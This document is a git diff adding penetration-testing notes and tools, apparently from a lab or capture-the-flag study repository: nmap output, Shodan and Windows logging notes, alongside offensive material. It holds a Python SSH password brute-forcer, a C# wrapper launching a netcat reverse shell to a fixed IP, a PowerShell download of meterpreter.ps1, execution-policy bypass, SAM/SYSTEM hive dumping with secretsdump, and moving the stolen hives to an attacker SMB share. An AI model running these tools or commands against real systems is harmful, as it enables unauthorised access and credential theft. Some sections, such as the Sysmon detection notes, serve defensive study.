```
|
||||||
|
## Plugins
|
||||||
|
```sh
|
||||||
|
nikto -h http://example.com -Plugins apacheusers
|
||||||
|
```
|
||||||
|
|
||||||
|
* List all plugins
|
||||||
|
```sh
|
||||||
|
nikto -list-plugins
|
||||||
|
```
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,4 @@
|
||||||
|
# Nmap 7.91 scan initiated Wed Aug 11 19:58:19 2021 as: nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit 10.10.156.247
|
||||||
|
Host: 10.10.156.247 () Status: Up
|
||||||
|
Host: 10.10.156.247 () Ports: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///, 31337/open/tcp//Elite///, 49152/open/tcp//unknown///, 49153/open/tcp//unknown///, 49154/open/tcp//unknown///, 49155/open/tcp//unknown///, 49161/open/tcp//unknown///, 49162/open/tcp/////
|
||||||
|
# Nmap done at Wed Aug 11 19:58:43 2021 -- 1 IP address (1 host up) scanned in 23.92 seconds
|
|
@ -0,0 +1,19 @@
|
||||||
|
# Nmap 7.91 scan initiated Wed Aug 11 19:58:19 2021 as: nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit 10.10.156.247
|
||||||
|
Nmap scan report for 10.10.156.247
|
||||||
|
Host is up (0.064s latency).
|
||||||
|
Not shown: 64293 closed ports, 1231 filtered ports
|
||||||
|
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
|
||||||
|
PORT STATE SERVICE
|
||||||
|
135/tcp open msrpc
|
||||||
|
139/tcp open netbios-ssn
|
||||||
|
445/tcp open microsoft-ds
|
||||||
|
3389/tcp open ms-wbt-server
|
||||||
|
31337/tcp open Elite
|
||||||
|
49152/tcp open unknown
|
||||||
|
49153/tcp open unknown
|
||||||
|
49154/tcp open unknown
|
||||||
|
49155/tcp open unknown
|
||||||
|
49161/tcp open unknown
|
||||||
|
49162/tcp open unknown
|
||||||
|
|
||||||
|
# Nmap done at Wed Aug 11 19:58:43 2021 -- 1 IP address (1 host up) scanned in 23.92 seconds
|
|
@ -0,0 +1,35 @@
|
||||||
|
<?xml version="1.0" encoding="UTF-8"?>
|
||||||
|
<!DOCTYPE nmaprun>
|
||||||
|
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
|
||||||
|
<!-- Nmap 7.91 scan initiated Wed Aug 11 19:58:19 2021 as: nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit 10.10.156.247 -->
|
||||||
|
<nmaprun scanner="nmap" args="nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit 10.10.156.247" start="1628704699" startstr="Wed Aug 11 19:58:19 2021" version="7.91" xmloutputversion="1.05">
|
||||||
|
<scaninfo type="syn" protocol="tcp" numservices="65535" services="1-65535"/>
|
||||||
|
<verbose level="0"/>
|
||||||
|
<debugging level="0"/>
|
||||||
|
<host starttime="1628704700" endtime="1628704723"><status state="up" reason="user-set" reason_ttl="0"/>
|
||||||
|
<address addr="10.10.156.247" addrtype="ipv4"/>
|
||||||
|
<hostnames>
|
||||||
|
</hostnames>
|
||||||
|
<ports><extraports state="closed" count="64293">
|
||||||
|
<extrareasons reason="resets" count="64293"/>
|
||||||
|
</extraports>
|
||||||
|
<extraports state="filtered" count="1231">
|
||||||
|
<extrareasons reason="no-responses" count="1231"/>
|
||||||
|
</extraports>
|
||||||
|
<port protocol="tcp" portid="135"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="msrpc" method="table" conf="3"/></port>
|
||||||
|
<port protocol="tcp" portid="139"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="netbios-ssn" method="table" conf="3"/></port>
|
||||||
|
<port protocol="tcp" portid="445"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="microsoft-ds" method="table" conf="3"/></port>
|
||||||
|
<port protocol="tcp" portid="3389"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="ms-wbt-server" method="table" conf="3"/></port>
|
||||||
|
<port protocol="tcp" portid="31337"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="Elite" method="table" conf="3"/></port>
|
||||||
|
<port protocol="tcp" portid="49152"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
|
||||||
|
<port protocol="tcp" portid="49153"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
|
||||||
|
<port protocol="tcp" portid="49154"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
|
||||||
|
<port protocol="tcp" portid="49155"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
|
||||||
|
<port protocol="tcp" portid="49161"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
|
||||||
|
<port protocol="tcp" portid="49162"><state state="open" reason="syn-ack" reason_ttl="127"/></port>
|
||||||
|
</ports>
|
||||||
|
<times srtt="64161" rttvar="6610" to="100000"/>
|
||||||
|
</host>
|
||||||
|
<runstats><finished time="1628704723" timestr="Wed Aug 11 19:58:43 2021" summary="Nmap done at Wed Aug 11 19:58:43 2021; 1 IP address (1 host up) scanned in 23.92 seconds" elapsed="23.92" exit="success"/><hosts up="1" down="0" total="1"/>
|
||||||
|
</runstats>
|
||||||
|
</nmaprun>
|
|
@ -0,0 +1,31 @@
|
||||||
|
# Shodan
|
||||||
|
|
||||||
|
## Checking found Autonomous System Number (ASN)
|
||||||
|
* Shodan does output ASN, not necessarily the IP of a small company. Search for
|
||||||
|
```h
|
||||||
|
asn:AS13335
|
||||||
|
```
|
||||||
|
* [ASN Check](https://dnschecker.org/asn-whois-lookup.php)
|
||||||
|
|
||||||
|
## Banner
|
||||||
|
* Example
|
||||||
|
```json
|
||||||
|
{
|
||||||
|
"data": "Moxa Nport Device",
|
||||||
|
"Status": "Authentication disabled",
|
||||||
|
"Name": "NP5232I_4728",
|
||||||
|
"MAC": "00:90:e8:47:10:2d",
|
||||||
|
"ip_str": "46.252.132.235",
|
||||||
|
"port": 4800,
|
||||||
|
"org": "Starhub Mobile",
|
||||||
|
"location": {
|
||||||
|
"country_code": "SG"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
## Filter
|
||||||
|
* vulns
|
||||||
|
```sh
|
||||||
|
vuln:ms17-010
|
||||||
|
```
|
|
@ -0,0 +1,38 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
import paramiko
|
||||||
|
import sys
|
||||||
|
import os
|
||||||
|
|
||||||
|
target = str(input("IP address: "))
|
||||||
|
username = str(input("Username: "))
|
||||||
|
password_file = str(input("Location of password file: "))
|
||||||
|
|
||||||
|
def ssh_connect(password, code=0):
|
||||||
|
ssh = paramiko.SSHClient()
|
||||||
|
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
|
||||||
|
|
||||||
|
try:
|
||||||
|
ssh.connect(target, port=22, username=username, password=password)
|
||||||
|
except paramiko.AuthenticationException:
|
||||||
|
code = 1
|
||||||
|
ssh.close()
|
||||||
|
return code
|
||||||
|
|
||||||
|
with open(password_file, 'rb') as _f:
|
||||||
|
for line in _f.readlines():
|
||||||
|
password = line.strip()
|
||||||
|
print(password)
|
||||||
|
try:
|
||||||
|
response = ssh_connect(password)
|
||||||
|
|
||||||
|
if response == 0 :
|
||||||
|
print("[+] Password Found: " + password.decode())
|
||||||
|
exit(0)
|
||||||
|
if response == 1:
|
||||||
|
print("[-] Nothing Found")
|
||||||
|
except Exception as e:
|
||||||
|
print(e)
|
||||||
|
pass
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit 3670e5da50b6230166d023c85d9807f8fc1b8e3a
|
|
@ -0,0 +1,13 @@
|
||||||
|
using System;
|
||||||
|
using System.Diagnostics;
|
||||||
|
|
||||||
|
namespace Wrapper {
|
||||||
|
class Program {
|
||||||
|
static void Main (){
|
||||||
|
Process proc = new Process();
|
||||||
|
ProcessStartInfo procInfo = new ProcessStartInfo("c:\\windows\\temp\\nc-mukaa.exe", "10.50.184.49 4447 -e cmd.exe");
|
||||||
|
proc.StartInfo = procInfo;
|
||||||
|
proc.Start();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
|
@ -0,0 +1,93 @@
|
||||||
|
# Logging
|
||||||
|
* [Windows Logging CheatSheet](https://static1.squarespace.com/static/552092d5e4b0661088167e5c/t/580595db9f745688bc7477f6/1476761074992/Windows+Logging+Cheat+Sheet_ver_Oct_2016.pdf)
|
||||||
|
* [NSA -- Spotting Adversary with Windows Event Monitoring](https://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm)
|
||||||
|
* [Events to Monitor](https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/appendix-l--events-to-monitor)
|
||||||
|
* [Windows 10 Monitoring Reference](https://www.microsoft.com/en-us/download/confirmation.aspx?id=52630)
|
||||||
|
|
||||||
|
## Loglevel
|
||||||
|
|ID|Event Type|Description|
|
||||||
|
|--|----------|-----------|
|
||||||
|
|0|Error|An event that indicates a significant problem.|
|
||||||
|
|1|Warning|An event that is not necessarily significant.|
|
||||||
|
|2|Information|An event describing the successful operation of an application.|
|
||||||
|
|3|Success Audit|An event that records an audited security access attempt that is successful.|
|
||||||
|
|4|Failure Audit|An event that records an audited security access attempt that is failure.|
|
||||||
|
|
||||||
|
## Logrotation
|
||||||
|
```sh
|
||||||
|
C:\Windows\System32\winevt\Logs
|
||||||
|
```
|
||||||
|
* As an example, paths can be found under `Microsoft > Windows > PowerShell > Operational` and right click `Properties` in Event Viewer. Logs can be cleared as well in properties.
|
||||||
|
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
|
||||||
|
* Event Viewer (GUI-based application)
|
||||||
|
* Wevtutil.exe (command-line tool)
|
||||||
|
* Get-WinEvent (PowerShell cmdlet)
|
||||||
|
|
||||||
|
### wevtutil.exe
|
||||||
|
```sh
|
||||||
|
wevtutil.exe /?
|
||||||
|
```
|
||||||
|
* Count logs
|
||||||
|
```sh
|
||||||
|
wevtutil.exe le | measure
|
||||||
|
```
|
||||||
|
* Read three most recent Application logs
|
||||||
|
```sh
|
||||||
|
wevtutil qe Application /c:3 /rd:true /f:text
|
||||||
|
```
|
||||||
|
|
||||||
|
### Get-WinEvent
|
||||||
|
* [Online help](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/Get-WinEvent?view=powershell-7.1)
|
||||||
|
* List all the logs
|
||||||
|
```sh
|
||||||
|
Get-WinEvent -ListLog *
|
||||||
|
```
|
||||||
|
* Find string
|
||||||
|
```sh
|
||||||
|
Get-WinEvent -Path .\merged.evtx | Where-Object { $_.Message -like '*log clear*' }
|
||||||
|
```
|
||||||
|
* Further filtering
|
||||||
|
```sh
|
||||||
|
Get-WinEvent -LogName Application | Where-Object { $_.ProviderName -Match 'WLMS' }
|
||||||
|
```
|
||||||
|
```sh
|
||||||
|
Get-WinEvent -ListProvider *Policy*
|
||||||
|
```
|
||||||
|
```sh
|
||||||
|
(Get-WinEvent -ListProvider Microsoft-Windows-GroupPolicy).Events | Format-Table Id, Description
|
||||||
|
```
|
||||||
|
* Filter by hashtable values
|
||||||
|
```sh
|
||||||
|
Get-WinEvent -FilterHashtable @{ LogName='Application'; ProviderName='MsiInstaller' };
|
||||||
|
```
|
||||||
|
```sh
|
||||||
|
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104} | Select-Object -Property Message | Select-String -Pattern 'SecureString'
|
||||||
|
```
|
||||||
|
* Including __XPATH__
|
||||||
|
```sh
|
||||||
|
Get-WinEvent -LogName Application -FilterXPath '*/System/EventID=101 and */System/Provider[@Name="WLMS"]'
|
||||||
|
```
|
||||||
|
```sh
|
||||||
|
Get-WinEvent -LogName Security -FilterXPath '*/EventData/Data[@Name="TargetUserName"]="System"'
|
||||||
|
```
|
||||||
|
```sh
|
||||||
|
Get-WinEvent -LogName Application -FilterXPath '*/System/Provider[@Name="WLMS"] and */System/TimeCreated[@SystemTime="2020-12-15T01:09:08.940277500Z"]' -MaxEvents 1
|
||||||
|
```
|
||||||
|
* Find login by username
|
||||||
|
```sh
|
||||||
|
Get-WinEvent -LogName Security -FilterXPath '*/System/EventID=4720 and */EventData/Data[@Name="TargetUserName"]="sam"'
|
||||||
|
```
|
||||||
|
|
||||||
|
### Command Line Logging
|
||||||
|
* Enable PS Logging
|
||||||
|
```sh
|
||||||
|
Local Computer Policy > Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell
|
||||||
|
```
|
||||||
|
* CLI Process Auditing -- ID 4688
|
||||||
|
```
|
||||||
|
Local Computer Policy > Computer Configuration > Administrative Templates > System > Audit Process Creation
|
||||||
|
```
|
||||||
|
|
|
@ -0,0 +1,18 @@
|
||||||
|
# Manual Windows Enumeration
|
||||||
|
|
||||||
|
* `whoami /priv`
|
||||||
|
* `whoami /groups`
|
||||||
|
* Looking for non-default services:
|
||||||
|
```sh
|
||||||
|
wmic service get name,displayname,pathname,startmode | findstr /v /i "C:\Windows"
|
||||||
|
```
|
||||||
|
* **Unquoted Service Path** Ideally there is a path without quotation
|
||||||
|
* Check which account the service the services run as
|
||||||
|
```sh
|
||||||
|
sc qc <ServiceName>
|
||||||
|
```
|
||||||
|
* Check if directory is writeable
|
||||||
|
```sh
|
||||||
|
powershell "get-acl -Path 'C:\Program Files (x86)\System Explorer' | format-list"
|
||||||
|
```
|
||||||
|
|
|
@ -0,0 +1,238 @@
|
||||||
|
# Powershell Usage
|
||||||
|
|
||||||
|
## Get-Help
|
||||||
|
```
|
||||||
|
Get-Help Command-Name
|
||||||
|
```
|
||||||
|
* Show examples
|
||||||
|
```
|
||||||
|
Get-Help Command-Name -Examples
|
||||||
|
```
|
||||||
|
|
||||||
|
* Get-Command gets all the cmdlets installed on the current Computer.
|
||||||
|
```
|
||||||
|
Get-Command
|
||||||
|
```
|
||||||
|
```
|
||||||
|
Get-Command Verb-*
|
||||||
|
Get-Command Invoke-*
|
||||||
|
Get-Command Get-*
|
||||||
|
```
|
||||||
|
|
||||||
|
## Passing Output via Pipe
|
||||||
|
* A pipe passes object including methods and attributes.
|
||||||
|
|
||||||
|
```
|
||||||
|
Verb-Noun | Get-Member
|
||||||
|
```
|
||||||
|
```
|
||||||
|
Get-Command | Get-Member -MemberType Method
|
||||||
|
```
|
||||||
|
|
||||||
|
## Creating Objects from Previous Cmdlets
|
||||||
|
```
|
||||||
|
Get-ChildItem | Select-Object -Property Mode, Name
|
||||||
|
```
|
||||||
|
* first - gets the first x object
|
||||||
|
* last - gets the last x object
|
||||||
|
* unique - shows the unique objects
|
||||||
|
* skip - skips x objects
|
||||||
|
|
||||||
|
## Filtering Objects
|
||||||
|
```
|
||||||
|
Verb-Noun | Where-Object -Property PropertyName -operator Value
|
||||||
|
Verb-Noun | Where-Object {$_.PropertyName -operator Value}
|
||||||
|
```
|
||||||
|
The second version uses the $_ operator to iterate through every object passed to the Where-Object cmdlet.
|
||||||
|
* Where -operator is a list of the following operators:
|
||||||
|
|
||||||
|
* -Contains: if any item in the property value is an exact match for the specified value
|
||||||
|
* -EQ: if the property value is the same as the specified value
|
||||||
|
* -GT: if the property value is greater than the specified value
|
||||||
|
|
||||||
|
## Sort Object
|
||||||
|
```
|
||||||
|
Verb-Noun | Sort-Object
|
||||||
|
```
|
||||||
|
```
|
||||||
|
Get-ChildItem | Sort-Object
|
||||||
|
```
|
||||||
|
|
||||||
|
## Finding a File
|
||||||
|
```
|
||||||
|
Get-ChildItem -Path C:\ -Recurse -Include *.txt -ErrorAction SilentlyContinue | Where-Object {$_.Name -match 'interesting-file'}
|
||||||
|
```
|
||||||
|
```sh
|
||||||
|
Get-HotFix | Format-list | findstr <searchstring>
|
||||||
|
```
|
||||||
|
|
||||||
|
## Showing File Content
|
||||||
|
```
|
||||||
|
Get-Content 'C:\Program Files\interesting-file.txt'
|
||||||
|
```
|
||||||
|
|
||||||
|
## Copy File Content
|
||||||
|
```sh
|
||||||
|
Copy-Item <sourcefile> <destfile>
|
||||||
|
```
|
||||||
|
|
||||||
|
## Count Lines of Output
|
||||||
|
As an example, count all cmdlets on the system
|
||||||
|
```
|
||||||
|
Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object
|
||||||
|
```
|
||||||
|
|
||||||
|
## Checksum of File
|
||||||
|
```
|
||||||
|
Get-FileHash -Algorithm MD5 'C:\Program Files\interesting-file.txt'
|
||||||
|
```
|
||||||
|
|
||||||
|
## Current Working Directory
|
||||||
|
```
|
||||||
|
Get-Location
|
||||||
|
```
|
||||||
|
|
||||||
|
## File Metadata
|
||||||
|
```sh
|
||||||
|
ls | Format-List *
|
||||||
|
```
|
||||||
|
|
||||||
|
## Web Request
|
||||||
|
```sh
|
||||||
|
Invoke-Webrequest -Uri 'http://<attacker-ip> -OutFile <filename>
|
||||||
|
```
|
||||||
|
```sh
|
||||||
|
(New-Object System.Net.WebClient).DownloadFile("http://example.com/meterpreter.ps1", 'meterpreter.ps1')
|
||||||
|
```
|
||||||
|
|
||||||
|
## Base64 Decode File
|
||||||
|
```
|
||||||
|
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content .\Desktop\b64.txt)))
|
||||||
|
```
|
||||||
|
|
||||||
|
## **Circumvent Execution-Policy**
|
||||||
|
```sh
|
||||||
|
powershell -ExecutionPolicy Bypass -File .\<file>
|
||||||
|
```
|
||||||
|
```sh
|
||||||
|
Set-ExecutionPolicy Bypass -Scope Process
|
||||||
|
```
|
||||||
|
|
||||||
|
## Enumeration
|
||||||
|
|
||||||
|
### Users
|
||||||
|
```
|
||||||
|
Get-LocalUser
|
||||||
|
```
|
||||||
|
|
||||||
|
* Password not required users
|
||||||
|
```
|
||||||
|
Get-LocalUser | Where-Object -Property PasswordRequired -Match false
|
||||||
|
```
|
||||||
|
|
||||||
|
* SID of users
|
||||||
|
```
|
||||||
|
Get-WmiObject win32_useraccount | Select name, sid
|
||||||
|
```
|
||||||
|
|
||||||
|
### Network intel
|
||||||
|
* IP Address
|
||||||
|
```
|
||||||
|
Get-NetIpAddress
|
||||||
|
```
|
||||||
|
|
||||||
|
* Listening TCP Ports
|
||||||
|
```
|
||||||
|
Get-NetTCPConnection | Where-Object -Property State -Match Listen | measure
|
||||||
|
```
|
||||||
|
|
||||||
|
* TCP Port by number
|
||||||
|
```
|
||||||
|
Get-NetTCPConnection | Where-Object -Property LocalPort -Match 443
|
||||||
|
```
|
||||||
|
|
||||||
|
### Patch level and updates
|
||||||
|
```
|
||||||
|
Get-Hotfix
|
||||||
|
```
|
||||||
|
* Find patch by HotFixID
|
||||||
|
```
|
||||||
|
Get-Hotfix | Where-Object -Property HotFixID -Match KB124284
|
||||||
|
```
|
||||||
|
|
||||||
|
### Find files and Content
|
||||||
|
* Find backup files
|
||||||
|
```
|
||||||
|
Get-ChildItem -Path C:\ -Recurse -Include *.bak* -ErroAction SilentlyContinue
|
||||||
|
```
|
||||||
|
|
||||||
|
* Find file contents
|
||||||
|
```
|
||||||
|
Get-ChildItem -Path C:\* -Recurse | Select-String -pattern API_KEY
|
||||||
|
```
|
||||||
|
|
||||||
|
### Processes
|
||||||
|
* Start processes
|
||||||
|
```sh
|
||||||
|
Start-Process <process>
|
||||||
|
```
|
||||||
|
|
||||||
|
* Running processes
|
||||||
|
```sh
|
||||||
|
Get-Process <process>
|
||||||
|
```
|
||||||
|
* Scheduled Tasks, by TaskName
|
||||||
|
```
|
||||||
|
Get-ScheduledTask | Where-Object -Property TaskName -Match taskname
|
||||||
|
```
|
||||||
|
or
|
||||||
|
```
|
||||||
|
Get-ScheduledTask -TaskName taskname
|
||||||
|
```
|
||||||
|
|
||||||
|
### Export Output
|
||||||
|
* Export as CSV
|
||||||
|
```sh
|
||||||
|
Get-Process <process> | Export-Csv <output.csv>
|
||||||
|
```
|
||||||
|
|
||||||
|
### ACL
|
||||||
|
* Owner of files
|
||||||
|
```
|
||||||
|
Get-ACL C:\
|
||||||
|
```
|
||||||
|
|
||||||
|
### Port Scanner
|
||||||
|
```
|
||||||
|
for($i=1; $i -le 65536; $i++) { Test-NetConnection localhost -Port $i}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Ping Hosts
|
||||||
|
```sh
|
||||||
|
1..15 | %{echo "10.0.2.$_"; ping -n 1 10.0.2$_ | Select-String ttl}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Using Powerview
|
||||||
|
```sh
|
||||||
|
Import-Module .\powerview.ps1
|
||||||
|
Get-NetDomainController
|
||||||
|
(Get-NetUser).name
|
||||||
|
Get-NetUser -properties description
|
||||||
|
Get-NetUser | select -ExpandProperty lastlogon
|
||||||
|
Get-NetComputer -ping
|
||||||
|
Get-NetGroupMember "Domain Admins"
|
||||||
|
Find-DomainShare -CheckShareAccess
|
||||||
|
```
|
||||||
|
* Enumerate Group Policy
|
||||||
|
```sh
|
||||||
|
Get-NetGPO
|
||||||
|
```
|
||||||
|
* Trust relationship to other domains
|
||||||
|
```sh
|
||||||
|
Get-NetDomainTrust
|
||||||
|
```
|
||||||
|
* User enumeration
|
||||||
|
```sh
|
||||||
|
Find-LocalAdminAccess
|
||||||
|
```
|
||||||
|
|
|
@ -0,0 +1,97 @@
|
||||||
|
# Sysinternals and CLI usage
|
||||||
|
|
||||||
|
## Opening System Properties
|
||||||
|
```
|
||||||
|
sysdm.cpl
|
||||||
|
```
|
||||||
|
|
||||||
|
## Installing webdav server,
|
||||||
|
|
||||||
|
* Starting windows webclient service
|
||||||
|
```
|
||||||
|
get-service webclient
|
||||||
|
start-service webclient
|
||||||
|
```
|
||||||
|
|
||||||
|
* Opening NetworkAndSharingCenter
|
||||||
|
```
|
||||||
|
control.exe /name Microsoft.NetworkAndSharingCenter
|
||||||
|
```
|
||||||
|
## Make sure Network Discovery is enabled, advanced settings!
|
||||||
|
|
||||||
|
```
|
||||||
|
Install-WindowsFeature WebDAV-Redirector –Restart
|
||||||
|
Get-WindowsFeature WebDAV-Redirector | Format-Table –Autosize
|
||||||
|
```
|
||||||
|
|
||||||
|
## Sigcheck
|
||||||
|
Sigcheck is a command-line utility that shows file version number, timestamp information, and digital signature details, including certificate chains. It also includes an option to check a file’s status on VirusTotal, a site that performs automated file scanning against over 40 antivirus engines, and an option to upload a file for scanning.
|
||||||
|
|
||||||
|
* Check for unsigned files in `C:\Windows\system32`
|
||||||
|
```
|
||||||
|
sigcheck -u -e C:\Windows\System32
|
||||||
|
```
|
||||||
|
* `-u` "If VirusTotal check is enabled, show files that are unknown by VirusTotal or have non-zero detection, otherwise show only unsigned files."
|
||||||
|
* `-e` "Scan executable images only (regardless of their extension)"
|
||||||
|
|
||||||
|
## Alternate Data Stream (ADS)
|
||||||
|
By default, all data is stored in a file's main unnamed data stream, but by using the syntax 'file:stream', you are able to read and write to alternates. (official definition)
|
||||||
|
```
|
||||||
|
streams file.txt
|
||||||
|
|
||||||
|
notepad file.txt:<datastream_name>
|
||||||
|
or
|
||||||
|
Get-Content -Path .\file.txt -stream ads.txt
|
||||||
|
```
|
||||||
|
|
||||||
|
## SDelete
|
||||||
|
SDelete is a command line utility that takes a number of options. In any given use, it allows you to delete one or more files and/or directories, or to cleanse the free space on a logical disk.
|
||||||
|
|
||||||
|
|
||||||
|
## TCPView
|
||||||
|
TCPView provides a more informative and conveniently presented subset of the Netstat program that ships with Windows. The TCPView download includes Tcpvcon, a command-line version with the same functionality.
|
||||||
|
|
||||||
|
```
|
||||||
|
tcpview
|
||||||
|
tcpvcon
|
||||||
|
```
|
||||||
|
|
||||||
|
## Autoruns
|
||||||
|
Autoruns reports Explorer shell extensions, toolbars, browser helper objects, Winlogon notifications, auto-start services, and much more.
|
||||||
|
|
||||||
|
## Procdump
|
||||||
|
ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike.
|
||||||
|
|
||||||
|
|
||||||
|
## Procdump
|
||||||
|
The Process Explorer display consists of two sub-windows. The top window always shows a list of the currently active processes, including the names of their owning accounts, whereas the information displayed in the bottom window depends on the mode that Process Explorer is in: if it is in handle mode you'll see the handles that the process selected in the top window has opened; if Process Explorer is in DLL mode you'll see the DLLs and memory-mapped files that the process has loaded.
|
||||||
|
|
||||||
|
## Procmon
|
||||||
|
Process Monitor is an advanced monitoring tool for Windows that shows real-time file system, Registry and process/thread activity.
|
||||||
|
|
||||||
|
## Psexec
|
||||||
|
PsExec is a light-weight telnet-replacement that lets you execute processes on other systems, complete with full interactivity for console applications, without having to manually install client software. PsExec's most powerful uses include launching interactive command-prompts on remote systems and remote-enabling tools like IpConfig that otherwise do not have the ability to show information about remote systems
|
||||||
|
|
||||||
|
|
||||||
|
## Winobj
|
||||||
|
WinObj is a 32-bit Windows NT program that uses the native Windows NT API (provided by NTDLL.DLL) to access and display information on the NT Object Manager's name space.
|
||||||
|
|
||||||
|
## BGInfo
|
||||||
|
It automatically displays relevant information about a Windows computer on the desktop's background, such as the computer name, IP address, service pack version, and more
|
||||||
|
|
||||||
|
## RegJump
|
||||||
|
This little command-line applet takes a registry path and makes Regedit open to that path. It accepts root keys in standard (e.g. HKEY_LOCAL_MACHINE) and abbreviated form (e.g. HKLM).
|
||||||
|
|
||||||
|
```
|
||||||
|
regjump HKLM
|
||||||
|
```
|
||||||
|
* Similar to
|
||||||
|
```
|
||||||
|
reg query HKLM
|
||||||
|
```
|
||||||
|
Get-Item
|
||||||
|
Get-ItemProperty
|
||||||
|
```
|
||||||
|
|
||||||
|
## Strings
|
||||||
|
Strings just scans the file you pass it for UNICODE (or ASCII) strings of a default length of 3 or more UNICODE (or ASCII) characters.
|
|
@ -0,0 +1,63 @@
|
||||||
|
# Sysmon
|
||||||
|
Sysmon gathers detailed and high-quality logs as well as event tracing that assists in identifying anomalies in your environment. Sysmon is most commonly used in conjunction with security information and event management (SIEM) system or other log parsing solutions that aggregate, filter, and visualize events.
|
||||||
|
|
||||||
|
## Paths
|
||||||
|
* Logfiles
|
||||||
|
```
|
||||||
|
Applications and Services Logs/Microsoft/Windows/Sysmon/Operational
|
||||||
|
```
|
||||||
|
|
||||||
|
## Configuration
|
||||||
|
* [SwiftOnSecurity](https://github.com/SwiftOnSecurity/sysmon-config)
|
||||||
|
* [ION-Storm](https://github.com/ion-storm/sysmon-config/blob/develop/sysmonconfig-export.xml)
|
||||||
|
|
||||||
|
## Installation
|
||||||
|
```sh
|
||||||
|
Downloads-SysInternalsTools C:\Sysinternals
|
||||||
|
```
|
||||||
|
|
||||||
|
## Best Practices
|
||||||
|
* Exclude, not include events
|
||||||
|
* CLI gives further control over filters
|
||||||
|
```sh
|
||||||
|
Get-WinEvent
|
||||||
|
```
|
||||||
|
```sh
|
||||||
|
wevutil.exe
|
||||||
|
```
|
||||||
|
* Know the env before implementation
|
||||||
|
|
||||||
|
## Filtering Events
|
||||||
|
* Actions -> Filter Current Log
|
||||||
|
|
||||||
|
### Filtering Events with Powershell
|
||||||
|
* Logged Events containing port 4444
|
||||||
|
```sh
|
||||||
|
Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=3 and */EventData/Data[@Name="DestinationPort"] and */EventData/Data=4444'
|
||||||
|
```
|
||||||
|
* Logged Events containing lsass.exe
|
||||||
|
```sh
|
||||||
|
Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=10 and */EventData/Data[@Name="TargetImage"] and */EventData/Data="C:\Windows\system32\lsass.exe"'
|
||||||
|
```
|
||||||
|
* Rats and C2
|
||||||
|
```sh
|
||||||
|
Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=3 and */EventData/Data[@Name="DestinationPort"] and */EventData/Data=<Port>'
|
||||||
|
```
|
||||||
|
|
||||||
|
## Evasion Techniques
|
||||||
|
* Alternate Data Streams
|
||||||
|
* Injections
|
||||||
|
* Masquerading
|
||||||
|
* Packing/Compression
|
||||||
|
* Recompiling
|
||||||
|
* Obfuscation
|
||||||
|
* Anti-Reversing Techniques
|
||||||
|
* Remote Thread (OpenThread, ResumeThread)
|
||||||
|
|
||||||
|
### Detecting Evasion Techniques with Powershell
|
||||||
|
```sh
|
||||||
|
Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=15'
|
||||||
|
Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=8'
|
||||||
|
```
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,14 @@
|
||||||
|
# Loot Windows Credentials
|
||||||
|
|
||||||
|
```sh
|
||||||
|
reg.exe save HKLM\SAM sam.bak
|
||||||
|
```
|
||||||
|
```sh
|
||||||
|
reg.exe save HKLM\SYSTEM system.bak
|
||||||
|
```
|
||||||
|
|
||||||
|
* Exifiltrate and use impacket
|
||||||
|
```sh
|
||||||
|
examples/secretsdump.py -sam sam.bak -system system.bak LOCAL
|
||||||
|
```
|
||||||
|
|
|
@ -0,0 +1,29 @@
|
||||||
|
# Connect to Attacker SMB
|
||||||
|
|
||||||
|
## Attacker
|
||||||
|
* Impacket smbserver on attacker
|
||||||
|
```sh
|
||||||
|
sudo examples/smbserver.py share . -smb2support -username <user> -password <password>
|
||||||
|
```
|
||||||
|
|
||||||
|
## Target
|
||||||
|
* Connect to attacker smb
|
||||||
|
```sh
|
||||||
|
net use \\<attacker-IP>\share /User:<user> <Password>
|
||||||
|
```
|
||||||
|
* Save data to attacker's smb
|
||||||
|
```sh
|
||||||
|
move sam.bak \\<attacker-IP>\share\sam.bak
|
||||||
|
